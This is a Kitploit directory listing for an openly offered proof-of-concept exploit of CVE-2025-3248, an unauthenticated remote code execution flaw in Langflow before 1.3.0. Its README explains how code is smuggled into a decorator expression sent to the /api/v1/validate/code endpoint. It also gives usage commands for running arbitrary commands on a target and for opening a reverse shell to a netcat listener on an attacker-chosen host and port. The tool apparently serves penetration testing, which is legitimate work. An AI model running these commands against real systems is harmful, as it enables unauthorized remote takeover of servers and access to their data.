Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Langflow-RCE-CVE-2025-3248 — Proof-of-concept exploit for CVE-2025-3248, a remote code execution vulnerability in Langflow, demonstrating exploitation of the vulnerable endpoint. | Kitploit
工具/GitHubGitHub/leotheggman/langflow-rce-cve-2025-3248
Vulnerability AnalysisExploitationWeb Application Exploitation
GitHubleotheggman/langflow-rce-cve-2025-3248

Langflow-RCE-CVE-2025-3248

Proof-of-concept exploit for CVE-2025-3248, a remote code execution vulnerability in Langflow, demonstrating exploitation of the vulnerable endpoint.

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
39天前尚未审核
分享
内容在请求的语言中不可用。显示英文版本。

CVE-2025-3248 — Langflow Unauthenticated RCE PoC

A clean, tested proof-of-concept for CVE-2025-3248, an unauthenticated remote code execution vulnerability in Langflow versions prior to 1.3.0.

banner python license


What is CVE-2025-3248?

Langflow's /api/v1/validate/code endpoint accepts Python code for static validation without requiring authentication. Because Python evaluates decorator expressions and default arguments at function-definition time — before the function body ever runs — an attacker can smuggle arbitrary code execution into a decorator expression:

Features

✅ Unauthenticated command execution ✅ Reverse shell mode (no target-side netcat needed) ✅ Built-in detection signal (checks for 'NoneType' marker) ✅ Clean modular structure ✅ Verified against Docker images 1.1.4 (vulnerable) and 1.3.0 (patched)

Installation

git clone https://github.com/LeotheGGman/Langflow-RCE-CVE-2025-3248.git cd Langflow-RCE-CVE-2025-3248 python3 -m venv venv source venv/bin/activate pip install -r requirements.txt

Usage

python3 exploit.py -u http://target:7860 -c "id > /tmp/pwned.txt" Fire a reverse shell Terminal A (your listener) nc -lvnp 4444 Terminal B python3 exploit.py -u http://target:7860
--revshell --lhost 172.17.0.1 --lport 4444

Verbose mode python3 exploit.py -u http://target:7860 -c "whoami" --verbose

下载工具